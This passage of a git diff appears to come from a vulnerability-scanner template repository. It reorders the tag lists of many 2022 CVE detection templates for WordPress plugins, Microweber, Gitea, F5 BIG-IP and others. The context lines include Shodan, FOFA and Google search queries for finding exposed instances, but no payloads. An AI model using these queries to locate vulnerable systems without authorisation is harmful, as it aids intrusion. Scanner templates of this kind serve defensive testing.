--- a/http/cves/2022/CVE-2022-0349.yaml +++ b/http/cves/2022/CVE-2022-0349.yaml @@ -28,7 +28,7 @@ info: vendor: wpdeveloper product: notificationx framework: wordpress - tags: cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,cve,wpdeveloper + tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,wpdeveloper http: - raw: diff --git a/http/cves/2022/CVE-2022-0378.yaml b/http/cves/2022/CVE-2022-0378.yaml index dd221379d4..27c43785f9 100644 --- a/http/cves/2022/CVE-2022-0378.yaml +++ b/http/cves/2022/CVE-2022-0378.yaml @@ -26,7 +26,7 @@ info: vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 - tags: cve,cve2022,microweber,xss,huntr + tags: cve2022,cve,microweber,xss,huntr http: - method: GET diff --git a/http/cves/2022/CVE-2022-0412.yaml b/http/cves/2022/CVE-2022-0412.yaml index 644ce51ad0..3b890aaa36 100644 --- a/http/cves/2022/CVE-2022-0412.yaml +++ b/http/cves/2022/CVE-2022-0412.yaml @@ -29,7 +29,7 @@ info: vendor: templateinvaders product: ti_woocommerce_wishlist framework: wordpress - tags: sqli,ti-woocommerce-wishlist,wpscan,cve,cve2022,woocommerce,wordpress,wp-plugin,wp,templateinvaders + tags: cve2022,cve,sqli,ti-woocommerce-wishlist,wpscan,woocommerce,wordpress,wp-plugin,wp,templateinvaders http: - raw: diff --git a/http/cves/2022/CVE-2022-0415.yaml b/http/cves/2022/CVE-2022-0415.yaml index d8feb8c22d..4df1db73f0 100644 --- a/http/cves/2022/CVE-2022-0415.yaml +++ b/http/cves/2022/CVE-2022-0415.yaml @@ -26,7 +26,7 @@ info: max-request: 6 vendor: gogs product: gogs - tags: rce,gogs,authenticated,huntr,cve,cve2022,intrusive + tags: cve,cve2022,rce,gogs,authenticated,huntr,intrusive http: - raw: diff --git a/http/cves/2022/CVE-2022-0422.yaml b/http/cves/2022/CVE-2022-0422.yaml index 1aa3e42d11..960606169b 100644 --- a/http/cves/2022/CVE-2022-0422.yaml +++ b/http/cves/2022/CVE-2022-0422.yaml @@ -27,7 +27,7 @@ info: vendor: videousermanuals product: white_label_cms framework: wordpress - tags: cve,cve2022,wordpress,xss,wp-plugin,wpscan,videousermanuals + tags: cve2022,cve,wordpress,xss,wp-plugin,wpscan,videousermanuals http: - raw: diff --git a/http/cves/2022/CVE-2022-0432.yaml b/http/cves/2022/CVE-2022-0432.yaml index 47283565d7..6cc0cde021 100644 --- a/http/cves/2022/CVE-2022-0432.yaml +++ b/http/cves/2022/CVE-2022-0432.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: joinmastodon product: mastodon - tags: mastodon,prototype,huntr,cve,cve2022,joinmastodon + tags: cve,cve2022,mastodon,prototype,huntr,joinmastodon http: - method: GET diff --git a/http/cves/2022/CVE-2022-0437.yaml b/http/cves/2022/CVE-2022-0437.yaml index 7384eb2b69..b7a54a2bfe 100644 --- a/http/cves/2022/CVE-2022-0437.yaml +++ b/http/cves/2022/CVE-2022-0437.yaml @@ -27,7 +27,7 @@ info: vendor: karma_project product: karma framework: node.js - tags: oss,huntr,cve,cve2022,karma,xss,karma_project,node.js + tags: cve2022,cve,oss,huntr,karma,xss,karma_project,node.js http: - method: GET diff --git a/http/cves/2022/CVE-2022-0441.yaml b/http/cves/2022/CVE-2022-0441.yaml index 2119fd14bb..93f51cfd56 100644 --- a/http/cves/2022/CVE-2022-0441.yaml +++ b/http/cves/2022/CVE-2022-0441.yaml @@ -29,7 +29,7 @@ info: vendor: stylemixthemes product: masterstudy_lms framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,unauth,stylemixthemes + tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,unauth,stylemixthemes variables: username: "{{to_lower(rand_text_alphanumeric(6))}}" password: "{{rand_text_alphanumeric(12)}}" diff --git a/http/cves/2022/CVE-2022-0535.yaml b/http/cves/2022/CVE-2022-0535.yaml index 18c28cdf3a..221ce1131c 100644 --- a/http/cves/2022/CVE-2022-0535.yaml +++ b/http/cves/2022/CVE-2022-0535.yaml @@ -30,7 +30,7 @@ info: vendor: e2pdf product: e2pdf framework: wordpress - tags: cve2022,wp-plugin,xss,authenticated,e2pdf,wpscan,cve,wordpress,wp + tags: cve,cve2022,wp-plugin,xss,authenticated,e2pdf,wpscan,wordpress,wp http: - raw: diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index a213516107..42c9cf172d 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ -28,7 +28,7 @@ info: product: formcraft3 framework: wordpress fofa-query: body="formcraft3" && body="wp-" - tags: wp,wp-plugin,wordpress,cve,formcraft3,wpscan,ssrf,cve2022,unauth,subtlewebinc + tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc http: - method: GET diff --git a/http/cves/2022/CVE-2022-0597.yaml b/http/cves/2022/CVE-2022-0597.yaml index 96f9ac4c16..c7b326edae 100644 --- a/http/cves/2022/CVE-2022-0597.yaml +++ b/http/cves/2022/CVE-2022-0597.yaml @@ -25,7 +25,7 @@ info: vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 - tags: huntr,cve,cve2023,microweber,redirect,oss, + tags: cve,cve2022,huntr,microweber,redirect,oss http: - method: GET diff --git a/http/cves/2022/CVE-2022-0656.yaml b/http/cves/2022/CVE-2022-0656.yaml index 8ea2e67097..2924636617 100644 --- a/http/cves/2022/CVE-2022-0656.yaml +++ b/http/cves/2022/CVE-2022-0656.yaml @@ -26,7 +26,7 @@ info: vendor: webtoprint product: web_to_print_shop\ google-query: inurl:"/wp-content/plugins/udraw" - tags: wp,wordpress,wp-plugin,unauth,cve,cve2022,lfi,udraw,wpscan,webtoprint + tags: cve,cve2022,wp,wordpress,wp-plugin,unauth,lfi,udraw,wpscan,webtoprint http: - raw: diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml index 7e32f5cd53..eeb2d95357 100644 --- a/http/cves/2022/CVE-2022-0660.yaml +++ b/http/cves/2022/CVE-2022-0660.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: microweber product: microweber - tags: cve2022,microweber,disclosure,authenticated,huntr,cve + tags: cve,cve2022,microweber,disclosure,authenticated,huntr http: - raw: diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml index c3926f191d..d98409dfa5 100644 --- a/http/cves/2022/CVE-2022-0678.yaml +++ b/http/cves/2022/CVE-2022-0678.yaml @@ -30,7 +30,7 @@ info: vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 - tags: huntr,cve,cve2022,xss,microweber + tags: cve,cve2022,huntr,xss,microweber http: - method: GET diff --git a/http/cves/2022/CVE-2022-0679.yaml b/http/cves/2022/CVE-2022-0679.yaml index a78f690b94..5551a49967 100644 --- a/http/cves/2022/CVE-2022-0679.yaml +++ b/http/cves/2022/CVE-2022-0679.yaml @@ -27,7 +27,7 @@ info: vendor: narnoo_distributor_project product: narnoo_distributor framework: wordpress - tags: narnoo-distributor,cve,cve2022,wordpress,wp-plugin,wpscan,wp,rce,unauth,lfi,narnoo_distributor_project + tags: cve,cve2022,narnoo-distributor,wordpress,wp-plugin,wpscan,wp,rce,unauth,lfi,narnoo_distributor_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0692.yaml b/http/cves/2022/CVE-2022-0692.yaml index 38c2e5898d..d37f134902 100644 --- a/http/cves/2022/CVE-2022-0692.yaml +++ b/http/cves/2022/CVE-2022-0692.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: alltube_project product: alltube - tags: huntr,cve,cve2022,redirect,rudloff,alltube,alltube_project + tags: cve,cve2022,huntr,redirect,rudloff,alltube,alltube_project http: - method: GET diff --git a/http/cves/2022/CVE-2022-0693.yaml b/http/cves/2022/CVE-2022-0693.yaml index 3d254ebd82..4785d955ed 100644 --- a/http/cves/2022/CVE-2022-0693.yaml +++ b/http/cves/2022/CVE-2022-0693.yaml @@ -28,7 +28,7 @@ info: vendor: devbunch product: master_elements framework: wordpress - tags: unauth,wpscan,wp-plugin,wp,sqli,wordpress,master-elements,cve,cve2022,devbunch + tags: cve2022,cve,unauth,wpscan,wp-plugin,wp,sqli,wordpress,master-elements,devbunch http: - raw: diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml index 8d8c16f581..606000a24e 100644 --- a/http/cves/2022/CVE-2022-0769.yaml +++ b/http/cves/2022/CVE-2022-0769.yaml @@ -28,7 +28,7 @@ info: vendor: usersultra product: users_ultra framework: wordpress - tags: wp,users-ultra,wpscan,cve,cve2022,sqli,wordpress,wp-plugin,usersultra + tags: cve,cve2022,wp,users-ultra,wpscan,sqli,wordpress,wp-plugin,usersultra http: - raw: diff --git a/http/cves/2022/CVE-2022-0773.yaml b/http/cves/2022/CVE-2022-0773.yaml index 15cfea75fa..ffea19230f 100644 --- a/http/cves/2022/CVE-2022-0773.yaml +++ b/http/cves/2022/CVE-2022-0773.yaml @@ -28,7 +28,7 @@ info: vendor: documentor_project product: documentor framework: wordpress - tags: unauth,cve2022,sqli,wp-plugin,wp,documentor-lite,wpscan,cve,wordpress,documentor_project + tags: cve2022,cve,unauth,sqli,wp-plugin,wp,documentor-lite,wpscan,wordpress,documentor_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0776.yaml b/http/cves/2022/CVE-2022-0776.yaml index 42ee55bdcc..60db432a2c 100644 --- a/http/cves/2022/CVE-2022-0776.yaml +++ b/http/cves/2022/CVE-2022-0776.yaml @@ -27,7 +27,7 @@ info: vendor: revealjs product: reveal.js framework: node.js - tags: hackerone,huntr,cve,cve2022,headless,postmessage,revealjs,node.js + tags: cve,cve2022,hackerone,huntr,headless,postmessage,revealjs,node.js headless: - steps: - args: diff --git a/http/cves/2022/CVE-2022-0781.yaml b/http/cves/2022/CVE-2022-0781.yaml index cd56b781f0..1b8950c1c1 100644 --- a/http/cves/2022/CVE-2022-0781.yaml +++ b/http/cves/2022/CVE-2022-0781.yaml @@ -28,7 +28,7 @@ info: vendor: nirweb product: nirweb_support framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wpscan,nirweb-support,unauth,nirweb + tags: cve2022,cve,wordpress,wp-plugin,wp,sqli,wpscan,nirweb-support,unauth,nirweb variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-0784.yaml b/http/cves/2022/CVE-2022-0784.yaml index 9dbff39222..8594628592 100644 --- a/http/cves/2022/CVE-2022-0784.yaml +++ b/http/cves/2022/CVE-2022-0784.yaml @@ -28,7 +28,7 @@ info: vendor: title_experiments_free_project product: title_experiments_free framework: wordpress - tags: cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,cve2022,wordpress,title_experiments_free_project + tags: cve2022,cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,wordpress,title_experiments_free_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0785.yaml b/http/cves/2022/CVE-2022-0785.yaml index 6570a0c492..63390efa9d 100644 --- a/http/cves/2022/CVE-2022-0785.yaml +++ b/http/cves/2022/CVE-2022-0785.yaml @@ -28,7 +28,7 @@ info: vendor: daily_prayer_time_project product: daily_prayer_time framework: wordpress - tags: sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,cve,cve2022,wp,daily_prayer_time_project + tags: cve2022,cve,sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,wp,daily_prayer_time_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml index 307281cf83..6414c37ae6 100644 --- a/http/cves/2022/CVE-2022-0786.yaml +++ b/http/cves/2022/CVE-2022-0786.yaml @@ -28,7 +28,7 @@ info: vendor: iqonic product: kivicare framework: wordpress - tags: sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,cve,cve2022,wpscan,iqonic + tags: cve,cve2022,sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,wpscan,iqonic http: - raw: diff --git a/http/cves/2022/CVE-2022-0787.yaml b/http/cves/2022/CVE-2022-0787.yaml index 8cb116a61a..6ca50626f6 100644 --- a/http/cves/2022/CVE-2022-0787.yaml +++ b/http/cves/2022/CVE-2022-0787.yaml @@ -25,7 +25,7 @@ info: vendor: limit_login_attempts_project product: limit_login_attempts framework: wordpress - tags: wpscan,cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project + tags: cve,cve2022,wpscan,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0788.yaml b/http/cves/2022/CVE-2022-0788.yaml index e80c56e8d4..a8cba8ff06 100644 --- a/http/cves/2022/CVE-2022-0788.yaml +++ b/http/cves/2022/CVE-2022-0788.yaml @@ -28,7 +28,7 @@ info: vendor: wpmet product: wp_fundraising_donation_and_crowdfunding_platform framework: wordpress - tags: cve,sqli,wordpress,wp-plugin,cve2022,wp,wp-fundraising-donation,unauth,wpscan,wpmet + tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-fundraising-donation,unauth,wpscan,wpmet http: - raw: diff --git a/http/cves/2022/CVE-2022-0817.yaml b/http/cves/2022/CVE-2022-0817.yaml index a4dc0b6481..082c8fb54b 100644 --- a/http/cves/2022/CVE-2022-0817.yaml +++ b/http/cves/2022/CVE-2022-0817.yaml @@ -28,7 +28,7 @@ info: vendor: badgeos product: badgeos framework: wordpress - tags: cve2022,wp,unauth,sqli,cve,wp-plugin,badgeos,wpscan,wordpress + tags: cve,cve2022,wp,unauth,sqli,wp-plugin,badgeos,wpscan,wordpress variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-0824.yaml b/http/cves/2022/CVE-2022-0824.yaml index 70201b2b5f..76c53d156c 100644 --- a/http/cves/2022/CVE-2022-0824.yaml +++ b/http/cves/2022/CVE-2022-0824.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: webmin product: webmin - tags: rce,oss,huntr,cve,cve2022,webmin,authenticated + tags: cve,cve2022,rce,oss,huntr,webmin,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index 2a0df91e2d..5ff60d8df1 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml @@ -28,7 +28,7 @@ info: vendor: wp-video-gallery-free_project product: wp-video-gallery-free framework: wordpress - tags: cve2022,wp-plugin,wpscan,cve,wordpress,wp,sqli,wp-video-gallery-free,unauth,wp-video-gallery-free_project + tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,sqli,wp-video-gallery-free,unauth,wp-video-gallery-free_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml index 3c7c205745..3c41679943 100644 --- a/http/cves/2022/CVE-2022-0846.yaml +++ b/http/cves/2022/CVE-2022-0846.yaml @@ -27,7 +27,7 @@ info: vendor: speakout\!_email_petitions_project product: speakout\!_email_petitions framework: wordpress - tags: wordpress,wp-plugin,wp,unauth,wpscan,cve,cve2022,sqli,speakout,speakout-email-petitions,speakout\!_email_petitions_project + tags: cve,cve2022,wordpress,wp-plugin,wp,unauth,wpscan,sqli,speakout,speakout-email-petitions,speakout\!_email_petitions_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml index 8030bd1dde..433fba1da3 100644 --- a/http/cves/2022/CVE-2022-0864.yaml +++ b/http/cves/2022/CVE-2022-0864.yaml @@ -28,7 +28,7 @@ info: vendor: 'updraftplus' product: 'updraftplus' framework: wordpress - tags: cve2022,xss,authenticated,updraftplus,wpscan,cve,wp-plugin,wp,wordpress,'updraftplus' + tags: cve,cve2022,xss,authenticated,updraftplus,wpscan,wp-plugin,wp,wordpress,'updraftplus' http: - raw: diff --git a/http/cves/2022/CVE-2022-0867.yaml b/http/cves/2022/CVE-2022-0867.yaml index 7754c54fe4..f270d4aa31 100644 --- a/http/cves/2022/CVE-2022-0867.yaml +++ b/http/cves/2022/CVE-2022-0867.yaml @@ -28,7 +28,7 @@ info: vendor: reputeinfosystems product: pricing_table framework: wordpress - tags: unauth,wp,cve2022,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,cve,reputeinfosystems + tags: cve,cve2022,unauth,wp,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,reputeinfosystems http: - raw: diff --git a/http/cves/2022/CVE-2022-0869.yaml b/http/cves/2022/CVE-2022-0869.yaml index 3e792a44c7..7f4f0ca24d 100644 --- a/http/cves/2022/CVE-2022-0869.yaml +++ b/http/cves/2022/CVE-2022-0869.yaml @@ -26,7 +26,7 @@ info: max-request: 4 vendor: spirit-project product: spirit - tags: huntr,cve,cve2022,redirect,nitely,spirit,spirit-project + tags: cve,cve2022,huntr,redirect,nitely,spirit,spirit-project http: - method: GET diff --git a/http/cves/2022/CVE-2022-0885.yaml b/http/cves/2022/CVE-2022-0885.yaml index b2967ecc89..244ec2fdf4 100644 --- a/http/cves/2022/CVE-2022-0885.yaml +++ b/http/cves/2022/CVE-2022-0885.yaml @@ -28,7 +28,7 @@ info: vendor: memberhero product: member_hero framework: wordpress - tags: unauth,wpscan,wp-plugin,rce,wp,wordpress,member-hero,cve,cve2022,memberhero + tags: cve,cve2022,unauth,wpscan,wp-plugin,rce,wp,wordpress,member-hero,memberhero http: - method: GET diff --git a/http/cves/2022/CVE-2022-0899.yaml b/http/cves/2022/CVE-2022-0899.yaml index 99cc2b25f4..307ffac18c 100644 --- a/http/cves/2022/CVE-2022-0899.yaml +++ b/http/cves/2022/CVE-2022-0899.yaml @@ -23,7 +23,7 @@ info: vendor: draftpress product: header_footer_code_manager framework: wordpress - tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,xss,authenticated,draftpress + tags: cve2022,cve,wpscan,wp,wp-plugin,wordpress,xss,authenticated,draftpress http: - raw: diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml index 889dc179bf..e18ae8e998 100644 --- a/http/cves/2022/CVE-2022-0928.yaml +++ b/http/cves/2022/CVE-2022-0928.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: microweber product: microweber - tags: cve,cve2022,authenticated,huntr,xss,microweber,cms + tags: cve2022,cve,authenticated,huntr,xss,microweber,cms http: - raw: diff --git a/http/cves/2022/CVE-2022-0948.yaml b/http/cves/2022/CVE-2022-0948.yaml index 8b30d5add2..5a7dd0336c 100644 --- a/http/cves/2022/CVE-2022-0948.yaml +++ b/http/cves/2022/CVE-2022-0948.yaml @@ -29,7 +29,7 @@ info: vendor: pluginbazaar product: order_listener_for_woocommerce framework: wordpress - tags: cve,wp,unauth,sqli,woc-order-alert,wpscan,cve2022,wordpress,wp-plugin,pluginbazaar + tags: cve,cve2022,wp,unauth,sqli,woc-order-alert,wpscan,wordpress,wp-plugin,pluginbazaar http: - raw: diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml index 7bbca60583..de47810ecb 100644 --- a/http/cves/2022/CVE-2022-0949.yaml +++ b/http/cves/2022/CVE-2022-0949.yaml @@ -27,7 +27,7 @@ info: vendor: stopbadbots product: block_and_stop_bad_bots framework: wordpress - tags: cve,stopbadbots,wp-plugin,wp,unauth,wpscan,cve2022,sqli,wordpress + tags: cve,cve2022,stopbadbots,wp-plugin,wp,unauth,wpscan,sqli,wordpress variables: IP: '{{rand_ip("1.1.1.0/24")}}' diff --git a/http/cves/2022/CVE-2022-0952.yaml b/http/cves/2022/CVE-2022-0952.yaml index 85db4303b8..1a8118aa07 100644 --- a/http/cves/2022/CVE-2022-0952.yaml +++ b/http/cves/2022/CVE-2022-0952.yaml @@ -27,7 +27,7 @@ info: vendor: sitemap_project product: sitemap framework: wordpress - tags: wp,wp-plugin,sitemap,wpscan,cve,cve2022,wordpress,sitemap_project + tags: cve,cve2022,wp,wp-plugin,sitemap,wpscan,wordpress,sitemap_project http: - raw: diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml index 97a5b5ba91..e193af386d 100644 --- a/http/cves/2022/CVE-2022-0954.yaml +++ b/http/cves/2022/CVE-2022-0954.yaml @@ -28,7 +28,7 @@ info: max-request: 3 vendor: microweber product: microweber - tags: cve,cve2022,xss,microweber,huntr + tags: cve2022,cve,xss,microweber,huntr http: - raw: diff --git a/http/cves/2022/CVE-2022-0963.yaml b/http/cves/2022/CVE-2022-0963.yaml index 0749d95257..e43f3054eb 100644 --- a/http/cves/2022/CVE-2022-0963.yaml +++ b/http/cves/2022/CVE-2022-0963.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: microweber product: microweber - tags: xss,microweber,cms,authenticated,huntr,cve,cve2022,intrusive + tags: cve,cve2022,xss,microweber,cms,authenticated,huntr,intrusive http: - raw: diff --git a/http/cves/2022/CVE-2022-1007.yaml b/http/cves/2022/CVE-2022-1007.yaml index fda6ef806a..8dcd6a9069 100644 --- a/http/cves/2022/CVE-2022-1007.yaml +++ b/http/cves/2022/CVE-2022-1007.yaml @@ -29,7 +29,7 @@ info: vendor: elbtide product: advanced_booking_calendar framework: wordpress - tags: wp-plugin,advanced-booking-calendar,cve,cve2022,wp,authenticated,wpscan,wordpress,xss,elbtide + tags: cve,cve2022,wp-plugin,advanced-booking-calendar,wp,authenticated,wpscan,wordpress,xss,elbtide http: - raw: diff --git a/http/cves/2022/CVE-2022-1013.yaml b/http/cves/2022/CVE-2022-1013.yaml index 9af377290f..c70f173ff7 100644 --- a/http/cves/2022/CVE-2022-1013.yaml +++ b/http/cves/2022/CVE-2022-1013.yaml @@ -27,7 +27,7 @@ info: vendor: ays-pro product: personal_dictionary framework: wordpress - tags: wp,unauth,wpscan,cve,cve2022,sqli,wordpress,wp-plugin,personal-dictionary,ays-pro + tags: cve,cve2022,wp,unauth,wpscan,sqli,wordpress,wp-plugin,personal-dictionary,ays-pro http: - raw: diff --git a/http/cves/2022/CVE-2022-1020.yaml b/http/cves/2022/CVE-2022-1020.yaml index 51e263df3e..381b694f2d 100644 --- a/http/cves/2022/CVE-2022-1020.yaml +++ b/http/cves/2022/CVE-2022-1020.yaml @@ -25,7 +25,7 @@ info: vendor: codeastrology product: woo_product_table framework: wordpress - tags: wpscan,wp,wp-plugin,wordpress,cve,cve2022,unauth,codeastrology + tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,unauth,codeastrology http: - raw: diff --git a/http/cves/2022/CVE-2022-1054.yaml b/http/cves/2022/CVE-2022-1054.yaml index c808eea68e..00bf3d1b98 100644 --- a/http/cves/2022/CVE-2022-1054.yaml +++ b/http/cves/2022/CVE-2022-1054.yaml @@ -24,7 +24,7 @@ info: vendor: wpchill product: rsvp_and_event_management framework: wordpress - tags: wordpress,cve,cve2022,wpscan,wp,wp-plugin,wpchill + tags: cve,cve2022,wordpress,wpscan,wp,wp-plugin,wpchill http: - method: GET diff --git a/http/cves/2022/CVE-2022-1058.yaml b/http/cves/2022/CVE-2022-1058.yaml index a529436980..a7893eaf0c 100644 --- a/http/cves/2022/CVE-2022-1058.yaml +++ b/http/cves/2022/CVE-2022-1058.yaml @@ -28,7 +28,7 @@ info: vendor: gitea product: gitea shodan-query: title:"Gitea" - tags: huntr,cve,cve2022,open-redirect,gitea + tags: cve,cve2022,huntr,open-redirect,gitea http: - raw: diff --git a/http/cves/2022/CVE-2022-1119.yaml b/http/cves/2022/CVE-2022-1119.yaml index 542c49c89d..fc27ab689b 100644 --- a/http/cves/2022/CVE-2022-1119.yaml +++ b/http/cves/2022/CVE-2022-1119.yaml @@ -29,7 +29,7 @@ info: vendor: simplefilelist product: simple-file-list framework: wordpress - tags: wp,wp-plugin,wpscan,cve,cve2022,lfi,wordpress,simplefilelist + tags: cve,cve2022,wp,wp-plugin,wpscan,lfi,wordpress,simplefilelist http: - method: GET diff --git a/http/cves/2022/CVE-2022-1168.yaml b/http/cves/2022/CVE-2022-1168.yaml index ca221f213e..f2d8683eef 100644 --- a/http/cves/2022/CVE-2022-1168.yaml +++ b/http/cves/2022/CVE-2022-1168.yaml @@ -27,7 +27,7 @@ info: product: jobsearch_wp_job_board framework: wordpress google-query: inurl:"wp-content/plugins/wp-jobsearch" - tags: wp-jobsearch",wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss + tags: cve,cve2022,wp-jobsearch",wpscan,wp-plugin,wp,wordpress,xss,eyecix http: - method: GET diff --git a/http/cves/2022/CVE-2022-1170.yaml b/http/cves/2022/CVE-2022-1170.yaml index 4cb0c2fcf3..cd82f2e136 100644 --- a/http/cves/2022/CVE-2022-1170.yaml +++ b/http/cves/2022/CVE-2022-1170.yaml @@ -25,7 +25,7 @@ info: product: jobmonster framework: wordpress publicwww-query: "/wp-content/themes/noo-jobmonster" - tags: wpscan,cve,cve2022,wp,wp-theme,wordpress,xss,jobmonster,nootheme + tags: cve,cve2022,wpscan,wp,wp-theme,wordpress,xss,jobmonster,nootheme http: - method: GET diff --git a/http/cves/2022/CVE-2022-1221.yaml b/http/cves/2022/CVE-2022-1221.yaml index ed2d5da606..ca4ef34c94 100644 --- a/http/cves/2022/CVE-2022-1221.yaml +++ b/http/cves/2022/CVE-2022-1221.yaml @@ -28,7 +28,7 @@ info: vendor: gwyn\'s_imagemap_selector_project product: gwyn\'s_imagemap_selector framework: wordpress - tags: cve2022,wpscan,xss,wordpress,wp-plugin,wp,cve,gwyn\'s_imagemap_selector_project + tags: cve,cve2022,wpscan,xss,wordpress,wp-plugin,wp,gwyn\'s_imagemap_selector_project http: - method: GET diff --git a/http/cves/2022/CVE-2022-1329.yaml b/http/cves/2022/CVE-2022-1329.yaml index 38bb797286..0bc01bbae5 100644 --- a/http/cves/2022/CVE-2022-1329.yaml +++ b/http/cves/2022/CVE-2022-1329.yaml @@ -28,7 +28,7 @@ info: vendor: elementor product: website_builder framework: wordpress - tags: cve,cve2022,rce,wordpress,wp-plugin,wp,elementor,authenticated,intrusive,fileupload + tags: cve2022,cve,rce,wordpress,wp-plugin,wp,elementor,authenticated,intrusive,fileupload http: - raw: diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml index cb020cf53e..a0795dd4e7 100644 --- a/http/cves/2022/CVE-2022-1386.yaml +++ b/http/cves/2022/CVE-2022-1386.yaml @@ -28,7 +28,7 @@ info: vendor: theme-fusion product: avada framework: wordpress - tags: wpscan,cve,cve2022,wordpress,ssrf,themefusion,wp,fusion,avada,intrusive,theme-fusion + tags: cve,cve2022,wpscan,wordpress,ssrf,themefusion,wp,fusion,avada,intrusive,theme-fusion http: - raw: diff --git a/http/cves/2022/CVE-2022-1388.yaml b/http/cves/2022/CVE-2022-1388.yaml index a025dc9cc5..290231d44e 100644 --- a/http/cves/2022/CVE-2022-1388.yaml +++ b/http/cves/2022/CVE-2022-1388.yaml @@ -30,7 +30,7 @@ info: vendor: f5 product: big-ip_access_policy_manager shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" - tags: f5,bigip,cve,cve2022,rce,mirai,kev + tags: cve,cve2022,f5,bigip,rce,mirai,kev variables: auth: "admin:" cmd: "echo CVE-2022-1388 | rev" diff --git a/http/cves/2022/CVE-2022-1390.yaml b/http/cves/2022/CVE-2022-1390.yaml index c34c377397..a4345e24e0 100644 --- a/http/cves/2022/CVE-2022-1390.yaml +++ b/http/cves/2022/CVE-2022-1390.yaml @@ -28,7 +28,7 @@ info: vendor: admin_word_count_column_project product: admin_word_count_column framework: wordpress - tags: packetstorm,wpscan,cve,cve2022,wordpress,wp-plugin,lfi,wp,admin_word_count_column_project + tags: cve,cve2022,packetstorm,wpscan,wordpress,wp-plugin,lfi,wp,admin_word_count_column_project http: - method: GET diff --git a/http/cves/2022/CVE-2022-1391.yaml b/http/cves/2022/CVE-2022-1391.yaml index b40ec357ff..1e4328426f 100644 --- a/http/cves/2022/CVE-2022-1391.yaml +++ b/http/cves/2022/CVE-2022-1391.yaml @@ -28,7 +28,7 @@ info: vendor: kanev product: cab_fare_calculator framework: wordpress - tags: cve2022,wordpress,wp-plugin,lfi,wp,edb,wpscan,cve,kanev + tags: cve,cve2022,wordpress,wp-plugin,lfi,wp,edb,wpscan,kanev http: - method: GET diff --git a/http/cves/2022/CVE-2022-1392.yaml b/http/cves/2022/CVE-2022-1392.yaml index 41229910c4..993e6d0f99 100644 --- a/http/cves/2022/CVE-2022-1392.yaml +++ b/http/cves/2022/CVE-2022-1392.yaml @@ -27,7 +27,7 @@ info: vendor: commoninja product: videos_sync_pdf framework: wordpress - tags: lfi,wp-plugin,unauth,wpscan,cve,cve2022,packetstorm,wp,wordpress,commoninja + tags: cve,cve2022,lfi,wp-plugin,unauth,wpscan,packetstorm,wp,wordpress,commoninja http: - method: GET diff --git a/http/cves/2022/CVE-2022-1398.yaml b/http/cves/2022/CVE-2022-1398.yaml index 5bb2b23557..a0f6b76c71 100644 --- a/http/cves/2022/CVE-2022-1398.yaml +++ b/http/cves/2022/CVE-2022-1398.yaml @@ -28,7 +28,7 @@ info: vendor: external_media_without_import_project product: external_media_without_import framework: wordpress - tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,wpscan,external-media-without-import,authenticated,intrusive,external_media_without_import_project + tags: 